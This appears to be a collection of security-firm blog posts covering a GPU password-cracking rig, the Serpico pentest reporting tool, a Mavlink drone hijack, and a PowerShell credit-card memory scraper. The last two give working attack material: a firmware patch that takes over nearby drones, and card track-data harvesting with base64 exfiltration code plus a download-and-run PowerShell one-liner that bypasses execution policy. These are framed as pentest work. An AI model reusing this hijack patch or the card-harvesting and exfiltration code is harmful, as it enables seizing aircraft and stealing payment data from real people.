This build doesn't require any "black magic" or hours of frustration the way desktop components can. If you follow this post and its parts list, you'll have a working rig in about 3 hours. These instructions should take the anxiety out of spending five figures without knowing whether you'll spend days banging your head against a wall.

The Goal

Upgrade our current rig from six GTX 970s to eight GTX 1080s. Don't blow a fuse.

Parts list




Nowadays, building a mid-grade to high-end password cracker is like playing with Legos, albeit expensive Legos.

We did a time lapse of the build:

Build notes

There are a few things we learned during purchasing and assembly.

  1. You don't need to purchase a separate heatsink and fan for your CPUs. The Tyan chassis comes with them.
  2. The Tyan chassis comes with brackets that screw into the back of your GPUs to secure them in place. These may not be needed if you never move the box, but it doesn't hurt to install them. We did.
  3. Rails are included with the Tyan.
  4. This chassis doesn't appear to have onboard hardware RAID. I just assumed it would 🙁
  5. The BIOS didn't require any modifications or flashing. It came fully updated as of January 2017.
  6. We disabled the system speaker because it will scream at you if you don't have all three power supplies plugged in.

The memory slots are not labeled. Fill the banks similar to this image.

In the image below you can see the brackets that attach to the rear of the GPU for added support. Probably not needed but if you were to ship this rig I'd install them. This thing is HEAVY!

Software Install

We had no hardware issues, but to play it safe we installed one GPU, booted the system, and once we verified it could POST with no issues, we started installing the OS. Once Ubuntu finished installing, we installed the remaining GPUs. Since things went so smoothly, next time I'd just install all eight GPUs up front and fire it up. Nothing to worry about.

Install Ubuntu 14.04.3 Server (x64)

Not going to cover this in detail, but here are a few things we considered.

  1. Use LVM
  2. We chose not to encrypt the whole disk or home directory. We generally create an encrypted volume later.
  3. Choose 'OpenSSH Server' from the software selection screen (one less step post-install)

Once the OS is installed, verify the GPUs are detected by the OS:

lspci | grep VGA

Update and install dependencies for drivers and hashcat

sudo apt-get update && sudo apt-get upgrade
sudo apt-get install gcc make p7zip-full git lsb-core

Download and install Nvidia drivers and Intel OpenCL runtime

Download Nvidia drivers. Nvidia 375.26 was current at the time of this build (January 2017).

UPDATE 4/10/2017 - If using 1080 Ti, use driver 378.13

chmod +x
sudo ./

If you get warning messages about 32-bit (x86) compatibility libraries, you can ignore them. Here's an example of one:

WARNING: Unable to find a suitable destination to install 32-bit compatibility libraries. Your system may not be set up for 32-bit compatibility. 32-bit compatibility files will not be installed; if you wish
to install them, re-run the installation and set a valid directory with the --compat32-libdir option

Install the Intel OpenCL runtime (not required, but why not put those CPUs to work too). Extract the archive and run the bundled install script (install.sh in this release):

tar -xvf opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz
cd opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25
sudo ./install.sh

Install hashcat

7z x hashcat-3.30.7z
cd hashcat-3.30

Test hashcat by running a benchmark. 341 GH/s!!!!

user@host:~/hashcat-3.30$ ./hashcat64.bin -m 1000 -b
hashcat (v3.30) starting in benchmark mode...
OpenCL Platform #1: NVIDIA Corporation
* Device #1: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #2: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #3: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #4: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #5: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #6: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #7: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
* Device #8: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
Hashtype: NTLM
Speed.Dev.#1.....: 42896.1 MH/s (62.48ms)
Speed.Dev.#2.....: 42604.1 MH/s (62.97ms)
Speed.Dev.#3.....: 42799.0 MH/s (62.57ms)
Speed.Dev.#4.....: 42098.9 MH/s (63.68ms)
Speed.Dev.#5.....: 42871.5 MH/s (62.57ms)
Speed.Dev.#6.....: 42825.0 MH/s (62.64ms)
Speed.Dev.#7.....: 42848.9 MH/s (62.54ms)
Speed.Dev.#8.....: 42449.8 MH/s (63.16ms)
Speed.Dev.#*.....:   341.4 GH/s
Started: Mon Feb 13 17:54:12 2017
Stopped: Mon Feb 13 17:54:31 2017
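As a quick sanity check, the aggregate Speed.Dev.#* line is just the sum of the eight per-device speeds:

```python
# Sanity check: the aggregate hashcat figure should equal the sum of the
# per-device NTLM speeds from the benchmark output above (values in MH/s).
per_device_mhs = [
    42896.1, 42604.1, 42799.0, 42098.9,
    42871.5, 42825.0, 42848.9, 42449.8,
]

total_ghs = sum(per_device_mhs) / 1000.0  # MH/s -> GH/s
print(f"{total_ghs:.1f} GH/s")  # -> 341.4 GH/s
```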

Install Hashview

Install dependencies

sudo apt-get update
sudo apt-get install mysql-server libmysqlclient-dev redis-server openssl

Optimize the database

vim /etc/mysql/my.cnf

Add the following line under the [mysqld] section:

innodb_flush_log_at_trx_commit  = 0

Restart mysql

sudo service mysql restart

Install RVM (the commands below are from RVM's installation instructions)

gpg --keyserver hkp:// --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
\curl -sSL | bash -s stable --ruby

Download and setup Hashview

git clone
cd hashview

Install gems (from Hashview directory)

rvm install ruby-2.2.2
gem install bundler
bundle install

Setup database connectivity

cp config/database.yml.example config/database.yml
vim config/database.yml

Create database

RACK_ENV=production rake db:setup

In another terminal or screen session, kick off resque

RACK_ENV=production TERM_CHILD=1 QUEUE=* rake resque:work

note: In production mode no output will be displayed until a job has started

Run Hashview

RACK_ENV=production ruby hashview.rb

Crack Hashes

Start a job and start cracking!

Then intensely watch analytics in realtime while sipping on your favorite cocktail

Stay tuned...

We just bought our second 8 GPU rig! In a future post we'll show you how to easily support distributed cracking using Hashview.


TL;DR: Reporting sucks, rarely does anyone enjoy it. Serpico is a tool that helps with reporting and makes it suck less through collaboration and automation, saving you time that you’d rather spend pentesting. Serpico is easy to install and works out of the box, yet highly customizable. Automating AND customizing your reports has never been more painless (I’ve tried lots of solutions). It might make you enjoy reporting…maybe 😉

A case study in pentest reporting using Serpico

I first learned of Serpico through a good friend (and project developer) Pete Arzamendi (bokojan). It was developed by pentesters faced with the same reporting challenges I often battled. Will Vandevanter (@_will_is) used his wickedly awesome knowledge on Office XML to develop Serpico, a powerful pentest reporting tool. He’s also the reason why I’m obsessed with Ruby and Sinatra.

So you might be wondering: haven't I heard of Dradis or MagicTree? Yes, I've heard of them, and with every new release I'd install them and hope they'd ease our reporting pain, but they always fell short.

Our existing solution was a report template in Word with custom document properties as variables. We'd have another Word document containing all the findings that we'd crib from. Unfortunately, the other reporting solutions increased our reporting time because we were always heavily modifying them or spending time dealing with software and report-generation errors.

Existing challenges related to report automation:

  • Overly complex applications – I don’t want to spend hours managing a complex solution. More time should be spent on crafting a quality report, not managing the automation tool.
  • Time consuming to customize – Our team has a few unique ways of doing things and customization should be easy.
  • Reliability – Solutions never worked out of the box, and if you managed to get it working, it never remained working for long, or a user could easily break it.
  • Portability – Wouldn’t it be nice to have your reporting solution be centralized but flexible to run locally if needed?
  • Team collaboration – Multiple pentesters should be able to contribute to the report without stepping on each other’s toes.
  • Reports always needed a lot of tweaking after being generated – I don’t want to run macros if I can avoid it, or substitute document properties. This should all be handled by the reporting tool.
  • Simplicity in design – Other tools try to manage my data, do too much automation, or just don’t have fully working basic features (generating an error free Word document).
  • Managing templated findings – Over time you tweak your findings, find better ways to word them, add new resources, or create a new finding during an engagement. Adding these changes back to the master findings database should be painless.

Features of Serpico and how we benefit from them

Serpico was quick and easy to install. I went from install to a customized generated report within 30 minutes. Update: an omnibus packaged installer was recently developed, making the install even faster! I added a finding to a test report and out popped a Word docx with no errors and no funky formatting issues, exactly like I always wanted. Will has done some research with Office XML, giving him a good understanding of all the Microsoft nuances that make this task more difficult than you'd think.

Here is a brief list of features that I find useful as a penetration tester:

  • Templated findings – You create template findings and can reuse them in any report. When you add a finding to a report, it's easy to customize it and tailor it to the client. If you like the changes you made, you even have the option to upload the finding back to the templates database with the push of a button. This drastically reduces repeated writing.
  • Custom meta language allows for programmatic generation of reports – For loops and if statements supported. This is helpful in generating tables of data and layouts by severity, category, etc.
  • Variables – Serpico also has the ability to create user-defined variables, so you'll never be limited. These are managed from within Serpico.
  • Written in ruby using Sinatra and Haml – This makes the project easy and fast to customize. Example: We wanted a dual approval approach to newly created findings. We added an additional field called “reviewed”. When a finding was peer reviewed for technicality by another pentester it would get marked as reviewed. When it was reviewed for grammar by our technical writer it was then marked as “approved” and the finding template would be available for everyone to use.
  • Screenshots – Upload your image, use the meta language to embed it in your finding, and that's it!
  • Automatic vulnerability mapping – If you have a vulnerability that can be detected via a vulnerability scanner, Serpico can automatically add the custom-written finding associated with that vulnerability from popular scanning tools. It matches by CVE, Nessus ID, Burp ID, etc.
  • Metasploit Integration – You can view hosts and vulnerabilities from any format that Metasploit supports. This feature is new and evolving.
  • Easy collaboration – There is an approval option to each finding, you can manage users and their access to reports, you can view historical edits of findings (like a wiki), and support for multiple report templates for different project types.
  • API and scripting – Serpico can be very powerful. There are examples of how you can import vulnerabilities from VulnDB via scripting.
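Conceptually, the automatic vulnerability mapping above is just a lookup from a scanner's identifier to one of your own templated findings. A minimal sketch of the idea (the IDs, titles, and function names here are illustrative, not Serpico's actual schema or code):

```python
# Illustrative sketch of scanner-ID -> templated-finding mapping. The IDs
# and finding titles below are made up; Serpico's real schema differs.
FINDING_MAP = {
    ("nessus", "12345"): "Weak SSL/TLS Cipher Suites Supported",
    ("cve", "CVE-2014-0160"): "OpenSSL Heartbleed Information Disclosure",
}

def map_finding(source, scanner_id):
    """Return the templated finding title for a scanner result, if any."""
    return FINDING_MAP.get((source.lower(), scanner_id))

print(map_finding("CVE", "CVE-2014-0160"))
```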

Centralized vs Distributed

Serpico supports both. Currently we use a centralized model: all users connect to one instance of Serpico to do reporting. However, on a couple of occasions we were required to do an onsite pentest with no Internet access and no sensitive data leaving the premises. One of us simply installed Serpico locally, and using its import and export features we moved all of our templated findings to the local instance very quickly.

Tips if you choose to use Serpico

  • Start by customizing the provided template.
  • When creating a customized report template, make one change at a time. If you make a mistake and foobar your template, it will be easier to find your error.
  • Stick to the approval process; straying from it might leave you with a bunch of poorly written templated findings that were hastily created by users.
  • DO NOT USE SERPICO TO AUTO GENERATE VULNERABILITY SCAN REPORTS. Serpico is all about quality reporting. Blindly converting a Nessus report finding by finding using this tool means you are contributing to low quality reports that we see in this industry. Tailor each report to your client’s needs.
  • Variables are not supported in headers and footers; remember that.
  • Provide developers with feedback to continue making it awesome.
  • Enjoy spending less time reporting!

I wrote this on the plane to Blackhat and Defcon 2016. The Serpico team asked me to join them at Blackhat Arsenal and I'm happy to help! Stop by to see a working demo and say hi. Follow @SerpicoProject for future updates.


Recently some of us here at shellntel have been building quadcopters and autonomous vehicles for fun.  We are big fans of the Pixhawk flight controller for its awesome autonomous capabilities.  We are also big fans of privacy.  As much as we like to build and fly these drones, we realize doing so in an irresponsible way can cause concern. We started looking into the various drone communications and discovered a design flaw that allowed us to take control of any drone flying with a specific telemetry protocol.

Telemetry allows the drone to exchange information and commands wirelessly with a ground station. This includes sending/receiving GPS coordinates, waypoints, throttle adjustments, arm and disarm commands, pretty much anything, including a serial shell.

The design flaw is not unique to PixHawk, but rather with the Mavlink protocol. Mavlink is used by many companies including:  Parrot AR.Drone (with Flight Recorder), ArduPilot, PX4FMU, pxIMU, SmartAP, MatrixPilot, Armazila 10dM3UOP88, Hexo+, TauLabs and AutoQuad. All of these companies make great products, but if they adopt the Mavlink protocol as is, it may be possible to hijack their drones (and any other drone using Mavlink).

According to its documentation, each Mavlink radio pair is set up with a NetID, or channel.  This is done to prevent two radio pairs from interfering with each other.  By default this value is set to 25, but the user can change this setting. To hijack one of these drones, all you'd need to do is set your transmitter to the same NetID as the target drone.

Looking at the protocol spec, each data packet sent by the radio includes the NetID in its transmission!  This means that all we need to do is listen for a single packet within the frequency spectrum, capture it, carve out the NetID, and set our radio to use it.  This is surprisingly easy.
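The carve step can be sketched in a few lines. This assumes, based on the gout[0]/gout[1] header check in the firmware, that the first two bytes of the golay-decoded header carry the 16-bit NetID; the byte order is a guess:

```python
# Hypothetical sketch of the carve step. Assumes the first two bytes of a
# golay-decoded SiK packet header are the 16-bit NetID (little-endian byte
# order assumed); the real firmware compares gout[0]/gout[1] directly.
def carve_netid(decoded_header: bytes) -> int:
    """Return the NetID carried in a decoded packet header."""
    return decoded_header[0] | (decoded_header[1] << 8)

# A header whose first two bytes encode the default NetID of 25:
print(carve_netid(bytes([25, 0, 6])))  # -> 25
```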

Using these radios (we used v2), we can modify the open-source firmware to do exactly this.  The following changes were made to radio.c, which when compiled is flashed to the transmitter.


Original Code:

    // decode the header
    errcount = golay_decode(6, buf, gout);
    if (gout[0] != netid[0] || gout[1] != netid[1]) {
        // its not for our network ID
        debug("netid %x %x\n", gout[0], gout[1]);
        goto failed;
    }

Modified Code:

    // decode the header
    errcount = golay_decode(6, buf, gout);
    if (gout[0] != netid[0] || gout[1] != netid[1]) {
        // its not for our network ID
        /* Modified by __int128 */
        // Set our radio to use the captured packet's NetID
        param_set(PARAM_NETID, gout[0]);
        // Save the value to flash
        param_save();
        // To read the new value we need to reboot
        RSTSRC |= (1 << 4);
        /* End of what was added by __int128 */
    }

The variable gout is set earlier in radio.c and is populated with the NetID of every captured packet.  This block of code is only hit when our radio hears a packet from another radio set to a different NetID than ours (which is good, because we don't want to reboot every time we hear a packet).  Anyway, that's it: three lines of code is all it takes to hijack any drone using Mavlink.  Compile it, flash the radio, and you're good to go.  It works surprisingly well and is super quick.

During the post-exploitation phase of a penetration test, I like to provide the client with examples of what could happen if a breach were to take place.  One of the most common examples of this is credit card theft. To demonstrate this threat, I created a PowerShell memory scraper that harvests track data from whatever application (many times a browser) the target is using. Why PowerShell? Because anti-virus doesn't prevent it, and it gives me the ability to quickly modify the script, tailoring it to the application used within the organization.

Thanks to the awesomeness of @mattifestation and PowerSploit, you can use Out-Minidump to create a memory dump of a process.  I created a lightweight script with logic to continuously dump a process's memory and scrape it for track data. Using Internet Explorer as an example, the script performs the following:

You can download the script from Github:

git clone

Here is a screenshot of the memory scraper in action harvesting track data:

very old expired credit card...don't even know why I redacted it

I created a few features that I find handy. One is the ability to encode and exfiltrate track data to a listener I have set up. It base64-encodes the track data and makes an HTTP GET request with the data included. I never send this data across the Internet, only to an internal box under my control or over an encrypted tunnel. You can use any method to set up a listener, but my favorite is:

python -m SimpleHTTPServer 80
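The encode-and-request pattern described above is simple enough to sketch end to end. Here's a hedged Python illustration of both sides; the "data" parameter name and listener address are made up for this example, not the script's actual values:

```python
import base64
from urllib.parse import parse_qs, quote, urlparse

# Illustrative sketch of the exfil encoding: base64 the track data and
# tuck it into a GET request. The "data" parameter and listener address
# are assumptions for this example, not the script's real values.
def build_exfil_url(track_data: str, listener: str = "http://10.0.0.5") -> str:
    encoded = base64.b64encode(track_data.encode()).decode()
    return f"{listener}/?data={quote(encoded)}"

def decode_exfil_url(url: str) -> str:
    """What the listener side does with a logged request line."""
    encoded = parse_qs(urlparse(url).query)["data"][0]
    return base64.b64decode(encoded).decode()

url = build_exfil_url("%B4111111111111111^DOE/JOHN^...")
print(decode_exfil_url(url))  # round-trips to the original track data
```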

The code supports harvesting plain card numbers if track data is not available, which I've used with success, though it occasionally produces false positives. There is a Luhn check and some regexes to help reduce the false positives, but if that isn't enough, you can specify an IIN/BIN to match on.  Matching on IINs comes in handy when your client/target is in the financial industry.  Coworker @curi0usJack helped me squash bugs and implemented a duplicate-checking feature so we're not sending and logging the same data over and over.
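The Luhn check itself is only a few lines. A minimal version of the idea (not the script's exact PowerShell implementation):

```python
def luhn_valid(number: str) -> bool:
    """Luhn checksum: double every second digit from the right, subtract 9
    from any result over 9, and sum; valid if the total is divisible by 10."""
    digits = [int(d) for d in number if d.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:  # every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

print(luhn_valid("4111111111111111"))  # -> True (well-known test PAN)
print(luhn_valid("4111111111111112"))  # -> False
```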

Many times my targeted users are in a terminal server environment. This makes my life easy because I can run the memory scraper in one centralized location (the terminal servers), but since there are multiple users, you'll want to limit the memory scraping to processes owned by your targeted users.  If not, you could be dumping memory from hundreds of processes that might not contain credit card data.  For this reason, I built a function that checks each process owner against the values of the -User parameter.  My common workflow is to identify my targeted users by group name in Active Directory, specify them with the -User parameter, and just let the memory scraper bake for a few days.
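The owner check is simple filtering. A sketch with processes modeled as (pid, name, owner) tuples; the real script resolves process owners through PowerShell, and the names below are illustrative:

```python
# Illustrative sketch of limiting a dump to targeted users' processes.
# Process info is modeled as (pid, name, owner) tuples here; the real
# script asks Windows for each process's owner before dumping it.
def filter_by_owner(processes, targeted_users):
    """Keep only processes owned by one of the targeted users."""
    wanted = {u.lower() for u in targeted_users}
    return [p for p in processes if p[2].lower() in wanted]

procs = [
    (101, "iexplore.exe", "CORP\\alice"),
    (102, "iexplore.exe", "CORP\\bob"),
    (103, "iexplore.exe", "CORP\\svc_backup"),
]
# Keeps only alice's and bob's processes:
print(filter_by_owner(procs, ["CORP\\alice", "CORP\\bob"]))
```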

Everyone likes one-liners. If you want to run the memory scraper (the example process is iexplore), run the following from the target system:

powershell.exe -exec bypass -Command "(New-Object Net.WebClient).DownloadFile('','mem_scraper.ps1');./mem_scraper.ps1 -Proc iexplore;"

I've found this method to be the quickest and most reliable. It only takes me minutes to narrow down my targets and deploy.  The script can be downloaded from Github and will work with PowerShell v2 and v3. I encourage you to give it a try on your next pentest (or within your organization with permission of course) and provide feedback.

Happy harvesting!

